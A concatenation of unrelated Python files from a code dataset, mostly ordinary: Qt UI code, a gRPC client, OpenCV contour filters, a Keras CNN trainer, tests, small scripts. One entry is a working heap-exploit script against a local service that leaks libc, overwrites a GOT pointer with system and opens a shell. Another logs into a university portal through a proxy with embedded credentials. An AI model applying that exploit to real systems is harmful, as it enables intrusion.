self.horizontalLayout_12.addWidget(self.button_color)
self.verticalLayout_2.addLayout(self.horizontalLayout_12)
self.horizontalLayout_9.addLayout(self.verticalLayout_2)
self.horizontalLayout_9.setStretch(0, 2)
self.horizontalLayout_9.setStretch(1, 1)
self.gridLayout_3.addLayout(self.horizontalLayout_9, 0, 0, 1, 1)
self.verticalLayout.addWidget(self.groupBox_2)
self.verticalLayout_5.addLayout(self.verticalLayout)
self.gridLayout.addLayout(self.verticalLayout_5, 0, 0, 1, 1)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(Qt.QtCompat.translate("Form", "Form", None, -1))
self.groupBox_2.setTitle(Qt.QtCompat.translate("Form", "partition", None, -1))
self.label_7.setText(Qt.QtCompat.translate("Form", "Position ", None, -1))
self.label_6.setText(Qt.QtCompat.translate("Form", "×", None, -1))
self.label.setText(Qt.QtCompat.translate("Form", "LineLength ", None, -1))
self.label_8.setText(Qt.QtCompat.translate("Form", "LineWidth ", None, -1))
self.label_5.setText(Qt.QtCompat.translate("Form", "Style ", None, -1))
self.combo_style.setItemText(0, Qt.QtCompat.translate("Form", "Horizontal", None, -1))
self.combo_style.setItemText(1, Qt.QtCompat.translate("Form", "Vertical", None, -1))
self.label_4.setText(Qt.QtCompat.translate("Form", "Label Font Size ", None, -1))
self.label_label.setText(Qt.QtCompat.translate("Form", "Label ", None, -1))
self.label_2.setText(Qt.QtCompat.translate("Form", "Color", None, -1))
self.button_color.setText(Qt.QtCompat.translate("Form", "SelectColor", None, -1))
|
StarcoderdataPython
|
1853424
|
<reponame>hzy001/xgboost-serving-1<filename>tensorflow_serving/example/xgboost_client.py
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#!/usr/bin/env python2.7
"""A client that talks to tensorflow_model_server.
Typical usage example:
xgboost_client.py --num_tests=100 --server=localhost:9000
"""
from __future__ import print_function
import sys
import time
import grpc
import numpy
import random
from grpc._cython.cygrpc import CompressionAlgorithm
from grpc._cython.cygrpc import CompressionLevel
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2
from tensorflow_serving.apis import prediction_service_pb2_grpc
from google.protobuf import text_format
import tensorflow as tf
tf.compat.v1.app.flags.DEFINE_integer('num_tests', 1, 'Number of tests')
tf.compat.v1.app.flags.DEFINE_string('server', '', 'PredictionService host:port')
FLAGS = tf.compat.v1.app.flags.FLAGS
def do_inference(hostport, num_tests):
"""Tests PredictionService with requests.
Args:
hostport: Host:port address of the PredictionService.
num_tests: Number of test images to use.
Returns:
void.
"""
host, port = hostport.split(':')
options = [
("grpc.default_compression_algorithm", CompressionAlgorithm.gzip),
("grpc.grpc.default_compression_level", CompressionLevel.high)
]
channel = grpc.insecure_channel(hostport, options)
stub = prediction_service_pb2_grpc.PredictionServiceStub(channel)
for _ in range(num_tests):
request = predict_pb2.PredictRequest()
request.model_spec.name = 'test'
# request.model_spec.version.value = 1
xgboost_feature_score_1 = predict_pb2.FeatureScore(
id=[2, 34, 2000, 2206],
score=[1, 1, 0.646667, 0.727273],
)
xgboost_features = [xgboost_feature_score_1 for i in range(0, 1)]
xgboost_feature_vector = predict_pb2.FeatureScoreVector(feature_score=xgboost_features)
request.inputs['xgboost_features'].CopyFrom(xgboost_feature_vector)
response = stub.Predict(request, 30.0)
print(response)
def main(_):
if FLAGS.num_tests > 10000:
print('num_tests should not be greater than 10k')
return
if not FLAGS.server:
print('please specify server host:port')
return
do_inference(FLAGS.server, FLAGS.num_tests)
if __name__ == '__main__':
tf.compat.v1.app.run()
|
StarcoderdataPython
|
6416308
|
<reponame>iandtek/realtor-deals-analyzer<filename>app.py
from flask import Flask
import json
app = Flask(__name__)
@app.route("/properties")
def properties():
return {'properties': json.load(open('properties.json'))}
if __name__ == "__main__":
app.run()
|
StarcoderdataPython
|
4801259
|
<filename>tests/test_cookie.py
#!/usr/bin/python3
"""
Testing the supposedly beautiful command line parsing
@author chairs
"""
import unittest
from cookie.cookie import Cookie
app = Cookie(__name__, notes=('simple', 'test'))
class TestCookie (unittest.TestCase):
def test_notes (self):
"""
Ensure that the notes feature of
the Cookie class is in working order
"""
self.assertEqual(('simple', 'test'), app.notes)
def test_decorator (self):
"""
Ensure that the decorator is working as expected
"""
@app.get_args
def test_function (name=str()):
return 'Hello %s!' % name
app.run(test_function)
assert 'Usage: ' in app.outline
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
9666464
|
<filename>ovl/target_filters/contour_filters.py
from typing import Tuple
import math
import cv2
from ..math.contours import contour_center
from ..math.geometry import distance_between_points
from ..math.image import distance_from_frame
from .contour_filter import contour_filter
from ..utils.types import RangedNumber
from ..utils.constants import DEFAULT_IMAGE_HEIGHT, DEFAULT_IMAGE_WIDTH
from ..math import image
@contour_filter
def image_center_filter(contour_list, image_dimensions: Tuple[int, int] = (DEFAULT_IMAGE_WIDTH, DEFAULT_IMAGE_HEIGHT),
min_ratio: RangedNumber(0, 1) = 0.7, max_ratio: RangedNumber(0, 1) = math.inf):
"""
Filters out contours that their center is not close enough to the center of the image
:param contour_list: a list of contours to be filtered
:param image_dimensions: the size of the image(width, height)
:param min_ratio: the minimum ratio between the distance from the image center to the distance from the frame
:param max_ratio: the maximum ratio between the distance from the image center to the distance from the frame
:return: list of contours within the maximum distance from the image center
"""
output = []
ratio = []
image_center = image.image_center(image_dimensions)
for contour in contour_list:
current_contour_center = contour_center(contour)
distance_from_image_center = distance_between_points(current_contour_center, image_center)
distance_from_image_frame = distance_from_frame(current_contour_center, image_dimensions)
distance_ratio = distance_from_image_center / distance_from_image_frame
if min_ratio <= distance_ratio <= max_ratio:
output.append(contour)
ratio.append(distance_ratio)
return output, ratio
@contour_filter
def distance_filter(contour_list, point: Tuple[int, int], min_dist: float = 0, max_dist: float = 50):
"""
Filters out contours that their center is not close enough
to the given (x, y) point in the image
:param contour_list: a list of contours to be filtered
:param point: the point from which the contours should be filtered a tuple (or list) of 2 numbers.
:param max_dist: the maximum distance from the point in pixels
:param min_dist: the minimum distance from the point in pixels
:return: the filtered contour list
"""
output = []
ratio = []
for contour in contour_list:
current_contour_center = contour_center(contour)
distance_from_center = distance_between_points(current_contour_center, point)
if max_dist >= distance_from_center >= min_dist:
output.append(contour)
ratio.append(distance_from_center)
return output, ratio
@contour_filter
def absolute_distance_filter(contour_list, max_dist=50, min_dist=0,
image_dimensions=(DEFAULT_IMAGE_WIDTH, DEFAULT_IMAGE_HEIGHT)):
"""
Filters out contours that their center is not close enough
to the center of the image
:param contour_list: a list of contours to be filtered
:param image_dimensions: the size of the image(width, height)
:param max_dist: the maximum distance from the center in pixels
:param min_dist: the minimum distance from the center in pixels
:return:
"""
output = []
ratio = []
image_center = (image_dimensions[0] / 2 - .5, image_dimensions[1] / 2 - .5)
for contour in contour_list:
current_contour_center = contour_center(contour)
distance_from_center = distance_between_points(current_contour_center, image_center)
if max_dist >= distance_from_center >= min_dist:
output.append(contour)
ratio.append(distance_from_center)
return output, ratio
@contour_filter
def length_filter(contour_list, min_length=50, max_length=76800):
"""
Receives a list of contours and removes ones that are not long enough
Note: for "open" contours only!
:param contour_list: list of contours (numpy array) to be filtered
:param min_length: minimum length of a contour (in pixels)
:param max_length: maximum length of a contour (in pixels)
:return: list of filtered contours and list of the lengths
"""
output = []
ratio = []
for contour in contour_list:
perimeter = cv2.arcLength(contour, False)
if min_length >= perimeter >= max_length:
output.append(contour)
ratio.append(perimeter)
return output, ratio
@contour_filter
def area_filter(contour_list, min_area: float = 200, max_area: float = math.inf):
"""
Filters contours that are not within the threshold of area (in pixels)
:param max_area: maximum area of a contour (Inclusive) default is no limit (infinity)
:param min_area: minimum area of a contour (Inclusive) set to 0 for no lower limit.
:param contour_list: List of Contours to filter
:return: the contour list filtered.
"""
output_list = []
ratio_list = []
for contour in contour_list:
contour_area = cv2.contourArea(contour)
if min_area <= contour_area <= max_area:
output_list.append(contour)
ratio_list.append(contour_area)
return output_list, ratio_list
@contour_filter
def percent_area_filter(contour_list, minimal_percent: RangedNumber(0, 1) = 0.02,
maximum_percent: RangedNumber(0, 1) = 1,
image_dimensions: Tuple[int, int] = (DEFAULT_IMAGE_WIDTH, DEFAULT_IMAGE_HEIGHT)):
"""
Filters out contours that are not in the specified ratio to the area of the image (1% -> 0.1)
:param contour_list: list of contours to be filtered (numpy.ndarray)
:param minimal_percent: the minimal ratio between the contour area and the image area
:param maximum_percent: the maximum ratio between the contour area and the image area
:param image_dimensions: The (width, height) of the image in pixels,
"""
output, ratios = [], []
output_append = output.append
ratio_append = ratios.append
image_size = image_dimensions[0] * image_dimensions[1]
if image_size == 0:
raise ValueError("Invalid image dimensions, Received (width, height): {}, {}".format(*image_dimensions))
for contour in contour_list:
contour_area = cv2.contourArea(contour)
percent_area = contour_area / image_size
if minimal_percent <= percent_area <= maximum_percent:
ratio_append(percent_area)
output_append(contour)
return output, ratios
@contour_filter
def size_ratio_filter(contours, min_ratio: float = 2, max_ratio: float = math.inf, reverse_ratio=False):
"""
Sorts out contours by the ratio between their width and height
:param contours: the contours to be filtered
:param min_ratio: the minimum ratio
:param max_ratio: the maximum ratio default
:param reverse_ratio: reversed the ratio to be height to width
:return: the filtered list
"""
output, ratios = [], []
output_append = output.append
ratios_append = ratios.append
for contour in contours:
_, _, width, height = cv2.boundingRect(contour)
if 0 in (width, height):
raise ValueError(
"The width or height of one of the contours was 0,\n"
" try using an area filter before this filter")
size_ratio = height / width if reverse_ratio else width / height
if min_ratio <= size_ratio <= max_ratio:
output_append(contour)
ratios_append(size_ratio)
return output, ratios
|
StarcoderdataPython
|
4859608
|
import socket
import telnetlib
import struct
from hexdump import hexdump
def q(a):
return struct.pack("I", a)
def interact():
t = telnetlib.Telnet()
t.sock = s
t.interact()
def r_until(st):
ret = ""
while st not in ret:
ret += s.recv(8192)
return ret
s = socket.create_connection(("localhost", 2323))
print r_until("option")
s.send("1\n16\n1\n16\n1\n16\n")
print r_until("option")
# 0x61616165 <-- 0x51515151
#dat = "a"*0x18+q(0x25)+q(0x51515151)+q(0x61616161)
# 0x804a06C <-- 0x804A004
dat = "/bin/sh\x00"+"a"*0x10+q(0x25)+q(0x804A004)+q(0x804a06C-4)
s.send("3\n0\n100\n")
print r_until("your data.")
s.send(dat)
print r_until("option")
s.send("2\n1\n")
print r_until("option")
s.send("4\n3\n")
dat = r_until("option")
fflush = struct.unpack("I", dat.split("id.\n")[1][0:4])[0]
libc_base = fflush - 0x657a0
system = libc_base + 0x3f430
print hex(libc_base)
# phase 2, change puts to be system
s.send("3\n3\n100\n")
print r_until("your data.")
s.send(q(fflush)+q(system))
# puts is broken here
s.send("4\n0\n")
print "** interact **"
interact()
|
StarcoderdataPython
|
238249
|
import unittest
from hamcrest import assert_that, equal_to
from lxslt import MatchName, DeepDive
class DeepDiveTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.diver = DeepDive(MatchName('child'))
def test_find_on_first_level(self):
tree = ['root', ['child']]
back = self.diver.project(tree)
assert_that(list(back), equal_to([['child']]))
def test_find_on_second_level(self):
tree = ['root', ['child', ['child', 'level2']]]
back = self.diver.project(tree)
assert_that(list(back), equal_to([['child', 'level2']]))
def test_find_several_on_deep_level(self):
tree = ['root', ['child',
['child', ['level2'],
['child', ['level3']],
['child', ['child', 'levelN']]]]]
back = self.diver.project(tree)
assert_that(list(back), equal_to(
[['child', ['level3']], ['child', 'levelN']]))
def test_stop_dive_on_mismatch(self):
tree = ['root', ['child', ['stop-dive', ['child', 'nested']]]]
back = self.diver.project(tree)
assert_that(list(back), equal_to(
[['child', ['stop-dive', ['child', 'nested']]]]))
def test_dive_on_headless_nodes(self):
tree = [[['child', [[['child', ['child', ['x', 'aaa']]]]]]]]
back = self.diver.project(tree)
assert_that(list(back), equal_to(
[['child', ['x', 'aaa']]]))
if '__main__' == __name__:
unittest.main()
|
StarcoderdataPython
|
6494235
|
<gh_stars>0
from threading import Thread
from . import test_cipher
from . import test_digest
class ThreadedTester(Thread):
failed = False
def run(self):
try:
test_digest.test_digest()
test_cipher.test_cipher(['a' * 1000, 'd' * 1000])
# test_evp.test_rand()
except Exception as e:
self.failed = True
self.exception = e
def test_threaded_crypto():
threads = [ThreadedTester() for i in range(10)]
map(lambda t: t.start(), threads)
# wait for the threads to complete
map(lambda t: t.join(), threads)
assert all(not t.failed for t in threads), "Some threads failed"
if __name__ == '__main__':
test_threaded_crypto()
|
StarcoderdataPython
|
1890866
|
<gh_stars>1-10
loot = input().split("|")
cmd = input()
class Treasure:
def __init__(self, loot):
self.loot = loot
def loot_items(self, found_treasure):
for item in found_treasure:
if item not in self.loot:
self.loot.insert(0, item)
def drop(self, idx):
if idx in range(len(self.loot)):
self.loot.append(self.loot.pop(idx))
def steal(self, count):
if count > len(self.loot):
count = len(self.loot)
stolen = []
for _ in range(count):
stolen.append(self.loot.pop())
print(', '.join(reversed(stolen)))
def __repr__(self):
if self.loot:
gains = list(map(len, self.loot))
average_gain = sum(gains) / len(self.loot)
return f'Average treasure gain: {average_gain:.2f} pirate credits.'
return 'Failed treasure hunt.'
treasure = Treasure(loot)
while not cmd == "Yohoho!":
command = cmd.split()[0]
if command == "Loot":
items = cmd.split()[1:]
treasure.loot_items(items)
elif command == "Drop":
loot_index = int(cmd.split()[1])
treasure.drop(loot_index)
elif command == "Steal":
items_count = int(cmd.split()[1])
treasure.steal(items_count)
cmd = input()
print(treasure)
|
StarcoderdataPython
|
263044
|
<reponame>fabiangunzinger/python_pottering
import turtle
def koch(t, n):
"""Draw a Koch curve of length n."""
if n < 25:
t.fd(n)
return
koch(t, n/3)
t.lt(60)
koch(t, n/3)
t.rt(120)
koch(t, n/3)
t.lt(60)
koch(t, n/3)
def snowflake(t, n):
"""Draw a Koch snowflake."""
for i in range(3):
koch(t, n)
t.rt(120)
bob = turtle.Turtle()
bob.pu()
bob.goto(-150, 90)
bob.pd()
koch(bob, 300)
turtle.mainloop()
|
StarcoderdataPython
|
5125951
|
import re
from distutils.command.build import build
from setuptools import setup
from setuptools.command.install import install as _install
VERSION = re.search(
r"^__version__ = ['\"]([^'\"]*)['\"]",
open('aws_ir/_version.py', 'r').read(),
re.MULTILINE
).group(1)
class install(_install):
def run(self):
self.run_command('build')
_install.run(self)
setup(name="aws_ir",
version=VERSION,
author="<NAME>, <NAME>, <NAME>, <NAME>",
author_email="<EMAIL>,<EMAIL>,<EMAIL>",
packages=["aws_ir", "aws_ir/libs", "aws_ir/plans"],
license="MIT",
description="AWS Incident Response ToolKit",
scripts=['bin/aws_ir'],
url='https://github.com/ThreatResponse/aws_ir',
download_url="https://github.com/ThreatResponse/aws_ir/archive/v0.3.0.tar.gz",
use_2to3=True,
install_requires=['boto3>=1.3.0',
'progressbar_latest',
'logutils==0.3.3',
'requests',
'structlog',
'pytz',
'jinja2',
'pluginbase',
'margaritashotgun>=0.4.1',
'aws-ir-plugins>=0.0.2'
],
tests_require=['pytest',
'pytest-cov',
'moto',
'mock',
'magicmock'],
)
|
StarcoderdataPython
|
1991086
|
from ..contrib.auth.signals import *
|
StarcoderdataPython
|
6429499
|
# This problem was asked by Google.
# Given an array of integers, return a new array where each element in the new array
# is the number of smaller elements to the right of that element in the original input array.
# For example, given the array [3, 4, 9, 6, 1], return [1, 1, 2, 1, 0], since:
# • There is 1 smaller element to the right of 3
# • There is 1 smaller element to the right of 4
# • There are 2 smaller elements to the right of 9
# • There is 1 smaller element to the right of 6
# • There are no smaller elements to the right of 1
####
class Node:
def insert(self, val, ctr = 0):
if not self.val:
self.val = val
return ctr
if val < self.val:
if not self.left:
self.left = Node()
return self.left.insert(val, ctr)
else:
if not self.right:
self.right = Node()
# Trace the number of right sifts and element goes through.
# This would give us the number of previously numbers it is grater than.
return self.right.insert(val, ctr + 1)
def __init__(self):
self.left = None
self.right = None
self.val = None
def numbers_less_than(arr):
root = Node()
sol = []
# Insert elements in reverse order. The tree is built with the intent to
# return the appropriate counters for each element.
for x in reversed(arr):
sol.insert(0, root.insert(x))
return sol
####
print(numbers_less_than([3, 4, 9, 6, 1]))
|
StarcoderdataPython
|
5087795
|
import numpy as np
import pandas as pds
from keras.models import Sequential
from keras.layers import Input, Dense, Dropout, BatchNormalization
from keras.wrappers.scikit_learn import KerasRegressor
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import KFold
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
from sklearn.metrics import mean_squared_error
from keras.callbacks import EarlyStopping
from keras.layers.convolutional import Conv1D
from keras.layers.pooling import MaxPooling1D
from keras.optimizers import Adam
import keras
from keras.layers.core import Dense, Activation, Dropout, Flatten
from keras.utils import plot_model
from keras.callbacks import TensorBoard
from keras.datasets import cifar10
from keras.utils import np_utils
import sys
import threading
import os
import pandas as pd
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix, accuracy_score, f1_score
import itertools
from sklearn import model_selection
from keras.optimizers import Adam
import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Dropout
from keras.optimizers import RMSprop
from sklearn.model_selection import StratifiedKFold
import seaborn as sns
from keras import backend as K
import tensorflow as tf
sns.set(style="whitegrid", color_codes=True)
#######################################
#
# please insert code here to prepare input data(x) and supervised data(y)
# or please run the program "3 Dimensional Data.py" first to fill in x and y
# NEED TO BE CHANGE
subject = ["Edo1", "Edo2", "Hyo", "Kei", "Michael", "Ren", "Seiji", "Takuya"]
num_of_subject = 8
num_of_data = 150 # number of data for each cut data excel file
movement = ["gentlestroke", "notouch", "poke", "press", "scratch"]
num_of_movement = 5 # number of movement types
total_file = [30, 5, 30, 30, 30] # number of excel files for each corresponding movement
# STATIC VAR
main_directory = "D:/TUAT/GV Lab Research Internship/Machine Learning/Data/Normalized_Cut_Data/Sensor1/" #dont forget to change the sensor's name!!!
# DYNAMIC VAR
coordinate = 0 # 0 for X, 1 for Y, 2 for Z
i = 0 # counting number of data in each file
counter = 0 # counting total file for EACH movement types
move = 0 # counting number of movement types
file = 0 # counting number of total file
# calculating total number of file
N = 0
for j in range(0, num_of_movement):
N = N + total_file[j]*num_of_subject
#3 dimensional matrix to be filled up
x = np.zeros((N, num_of_data, 3)) #(z,y,x)
#matrix to be filled up
y = np.zeros((N, 1))
# Iteration to fill up the 3 dimensional matrix input & the supervised data
for people in range (0, num_of_subject): #subject change
directory = main_directory + subject[people] + "/" + str(num_of_data)
while move < num_of_movement: # movement change
while counter < total_file[move]: # file change
y[file, 0] = move
file_read = pd.read_excel(
directory + "/" + movement[move] + "n_" + str(num_of_data) + "_" + str(counter) + ".xlsx", "Sheet")
while coordinate < 3: # coordinate change
for i in range(0, (num_of_data)): # data change
x[file, i, coordinate] = file_read[coordinate][i]
coordinate += 1
i = 0
counter += 1
file += 1
coordinate = 0
move += 1
counter = 0
move = 0
print (x)
print (y)
print ("3 Dimensional Data-------end")
#######################################
#YOU CAN CHANGE THIS PART
#test_size = percentage of the data that will be used for testing the model
(X_train, X_test, y_train, y_test) = train_test_split(x, y, test_size=0.3)
print('split out')
nb_classes = 5 #CHANGE NUMBER OF CLASSES HERE
fold_num = 5
Y_train = np_utils.to_categorical(y_train, nb_classes)
Y_test = np_utils.to_categorical(y_test, nb_classes)
# Y_train = np.reshape(np.array(y_train),(420))
# Y_test = np.reshape(np.array(y_test),(1,180))
train_X = np.reshape(np.array(X_train), (X_train.shape[0], 450))
train_X = np.reshape(np.array(train_X), (X_train.shape[0], 450, 1))
test_X = np.reshape(np.array(X_test), (X_test.shape[0], 450))
test_X = np.reshape(np.array(test_X), (X_test.shape[0], 450, 1))
# input_x = K.placeholder(shape=(None, train_X.shape[1], train_X.shape[2]), name='X')
# input_y = K.placeholder(shape=(None, nb_classes), name='Y')
print('ready')
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
print(cm)
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
# → UPPER (edited)
# モデルの定義
model = Sequential()
model.add(Conv1D(64, 3, padding='same', input_shape=(450, 1)))
model.add(Activation('relu'))
model.add(Conv1D(64, 3, padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling1D(2, padding='same'))
model.add(Conv1D(128, 3, padding='same'))
model.add(Activation('relu'))
model.add(Conv1D(128, 3, padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling1D(2, padding='same'))
model.add(Conv1D(256, 3, padding='same'))
model.add(Activation('relu'))
model.add(Conv1D(256, 3, padding='same'))
model.add(Activation('relu'))
model.add(Conv1D(256, 3, padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling1D(2, padding='same'))
model.add(Conv1D(512, 3, padding='same'))
model.add(Activation('relu'))
model.add(Conv1D(512, 3, padding='same'))
model.add(Activation('relu'))
model.add(Conv1D(512, 3, padding='same'))
model.add(Activation('relu'))
model.add(Flatten())
model.add(Dense(4096))
model.add(Dense(4096))
model.add(Dropout(0.5))
model.add(Dense(5)) #CHANGE HERE TO CHANGE THE NUMBER OF CLASSES
model.add(Activation('softmax'))
adam = Adam(lr=1e-4)
model.compile(optimizer=adam, loss='categorical_crossentropy', metrics=["accuracy"])
model.summary()
epochs = 100
#YOU CAN CHANGE THIS PART
#this is for the early stops when the loss start to increase instead of decreasing
#early_stopping = EarlyStopping(patience=2,atience=5, verbose=1, mode verbose=1)
# es_cb = EarlyStopping(monitor='val_loss', p='auto')
#bacth_size = changing the number of file will be used before updating the weights and bias in 1 epoch
#validation_split = the percentage of the data that will be used for the validation during the training
history = model.fit(x=train_X, y=Y_train, batch_size=10, validation_split=0.3, epochs=epochs)
plt.plot(range(len(history.history['loss'])), history.history['loss'], label='loss')
plt.plot(range(len(history.history['val_loss'])), history.history['val_loss'], label='val_loss')
plt.xlabel('epoch')
plt.ylabel('loss')
plt.legend()
plt.show()
#YOU CAN CHANGE THIS PART
#this is the file name to save the CNN Model (cnn_model.json) and the weights (cnn_model_weights.hdf5)
json_string = model.to_json()
open(os.path.join('./', 'cnn_model.json'), 'w').write(json_string)
model.save_weights(os.path.join('./', 'cnn_model_weight.hdf5'))
score = model.evaluate(test_X, Y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
pred_y = model.predict(test_X)
pred_Y = np.argmax(pred_y, axis=1)
pred_Y = pred_Y[:, np.newaxis] # 縦ベクトル
confusion_matrix(y_test, pred_Y)
print(f1_score(y_test, pred_Y, average='macro'))
# Compute confusion matrix
cnf_matrix = confusion_matrix(y_test, pred_Y)
np.set_printoptions(precision=2)
# Plot non-normalized confusion matrix
class_names = ["", "", "", ""]
plt.figure()
plot_confusion_matrix(cnf_matrix, classes=class_names,
title='Confusion matrix, without normalization')
# Plot normalized confusion matrix
plt.figure()
plot_confusion_matrix(cnf_matrix, classes=class_names, normalize=True,
title='Normalized confusion matrix')
plt.show()
# →LOWER (edited)
|
StarcoderdataPython
|
6456185
|
<reponame>tejpratap545/E-Commerce-Application
from backend.users.models import User
from factory import post_generation
from factory.django import DjangoModelFactory
from faker import Faker
from oauth2_provider.models import Application
from typing import Any, Sequence
import factory
fake = Faker()
class UserFactory(DjangoModelFactory):
class Meta:
model = User
django_get_or_create = ["email"]
contact_number = fake.phone_number()
email = fake.email()
first_name = fake.first_name()
last_name = fake.last_name()
date_of_birth = fake.date_of_birth()
@post_generation
def password(self, create: bool, extracted: Sequence[Any], **kwargs):
password = "<PASSWORD>"
self.set_password(password)
class AdminUserFactory(UserFactory):
is_admin = True
class SuperUserFactory(DjangoModelFactory):
class Meta:
model = User
django_get_or_create = ["email"]
contact_number = fake.phone_number()
email = fake.email()
first_name = fake.first_name()
last_name = fake.last_name()
date_of_birth = fake.date_of_birth()
is_superuser = True
@post_generation
def password(self, create: bool, extracted: Sequence[Any], **kwargs):
password = "<PASSWORD>"
self.set_password(password)
class SellerUserFactory(UserFactory):
is_seller = True
class ApplicationFactory(DjangoModelFactory):
class Meta:
model = Application
django_get_or_create = ["name"]
name = fake.name()
authorization_grant_type = "password"
client_type = "confidential"
user = factory.SubFactory(SuperUserFactory)
|
StarcoderdataPython
|
1728939
|
<gh_stars>1-10
import mechanize
import http.cookiejar
from bs4 import BeautifulSoup as bs
import json
import pandas as pd
# Browser
br = mechanize.Browser()
# Cookie Jar
cj = http.cookiejar.LWPCookieJar()
br.set_cookiejar(cj)
# Browser options
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.set_proxies({"http": "s.barnwal:[email protected]:3128"})
br.addheaders = [('User-agent', 'Chrome')]
# The site we will navigate into, handling it's session
br.open('https://online.iitg.ernet.in/tnp/')
# Select the second (index one) form (the first form is a search query box)
br.select_form(nr=0)
# User credentials
br.form['username'] = 's.barnwal'
br.form['password'] = ''
# Login
br.submit()
# open all jobs list
page = br.open('https://online.iitg.ernet.in/tnp/student/job_all_list.jsp')
# open in Beautiful soup
soup = bs(page, "lxml")
all_tables=soup.find_all('table')
right_table=soup.find('table', class_='table taable-responsive table-hover')
#start storing information
#storage containers
company = []
designation = []
profile = []
links = []
eligibility10 = []
eligibility12 = []
bdesCTC = []
btechCTC = []
mdesCTC = []
mtechCTC = []
maCTC = []
mscCTC = []
phdCTC = []
msrCTC = []
allCTC = [bdesCTC, btechCTC, mdesCTC, mtechCTC, maCTC, mscCTC, phdCTC, msrCTC]
resumeShortlist = []
techTest = []
aptiTest = []
gd = []
eligibleDepts = []
# main code
for row in right_table.find_all("tr"):
cells = row.find_all("td")
if len(cells) == 6:
company.append(cells[1].string.replace("\n", ""))
designation.append(cells[2].string.replace("\n", ""))
profile.append(cells[3].string.replace("\n", ""))
link = cells[5].a['href']
links.append(link)
# find job details
# open job link
companyLink = "https://online.iitg.ernet.in/tnp/student/" + link
companyPage = br.open(companyLink)
companySoup = bs(companyPage, "lxml")
# eligibity
eligibilityTable = companySoup.select_one("#Eligibility table")
for row in eligibilityTable.find_all("tr"):
cells = row.find_all("td")
if len(cells) == 4:
eligibility10.append(cells[0].string)
eligibility12.append(cells[1].string)
# ctc
ctcTable = companySoup.select_one("#Salary_Details table")
i = 0
for row in ctcTable.find_all("tr"):
cells = row.find_all("td")
if len(cells) == 4:
if cells[1].string == "0.00":
allCTC[i%len(allCTC)].append("NA")
else:
allCTC[i%len(allCTC)].append(cells[1].string)
i = i+1
# shortlist from resume
resume = companySoup.select_one("#Selection_Process > .row:nth-of-type(5) > .col-md-10")
resumeShortlist.append(resume.string)
# technical test
tech = companySoup.select_one("#Selection_Process > .row:nth-of-type(6) > .col-md-10")
techTest.append(tech.string)
# aptitude test
apti = companySoup.select_one("#Selection_Process > .row:nth-of-type(7) > .col-md-10")
aptiTest.append(apti.string)
# group discussion
g = companySoup.select_one("#Selection_Process > .row:nth-of-type(12) > .col-md-10")
gd.append(g.string)
# eligible depts
eligibleTable = companySoup.select_one("#Eligible_Programmes_and_Departments table")
depts = {}
for row in eligibleTable.find_all('tr'):
cells = row.find_all('td')
if len(cells) == 6:
key = cells[1].string.replace("\n", "") + ", " + cells[3].string.replace("\n", "") + ", " + cells[4].string.replace("\n", "")
depts[key] = cells[5].string
toReplace = '{""}'
string = json.dumps(depts, sort_keys=True, indent=0)
for i in toReplace:
string = string.replace(i, '')
eligibleDepts.append(string)
# make dataframe
final_dataframe = pd.DataFrame(
{'Company Name': company,
'Designation': designation,
'Profile': profile,
'10th %': eligibility10,
'12th %': eligibility12,
'CTC for B.Des': bdesCTC,
'CTC for B.Tech': btechCTC,
'CTC for M.Des': mdesCTC,
'CTC for M.Tech': mtechCTC,
'CTC for M.A.': maCTC,
'CTC for M.Sc': mscCTC,
'CTC for Ph.D.': phdCTC,
'CTC for M.S(R)': msrCTC,
'Resume shortlist': resumeShortlist,
'Technical test': techTest,
'Aptitude test': aptiTest,
'Group discussion': gd,
'Eligible departments': eligibleDepts
})
# final_dataframe.to_excel("ccd.xlsx")
final_dataframe.to_csv(path_or_buf="boo.csv", index=False)
|
StarcoderdataPython
|
1658779
|
#!/usr/bin/python3
from random import randint
def randhex():
i = randint(0,255)
return bytes([i])
def divider1(fname):
divisor = 2
fp1 = open(fname, 'rb')
fp2 = open(fname+'.out1', 'wb')
fp3 = open(fname+'.out2', 'wb')
i = 0
c = fp1.read(1)
while c:
if(i%divisor==0):
fp2.write(c)
else:
fp2.write(randhex())
c = fp1.read(1)
i+=1
fp2.close()
i = 0
fp1.seek(0)
c = fp1.read(1)
while c:
if(i%divisor==1):
fp3.write(c)
else:
fp3.write(randhex())
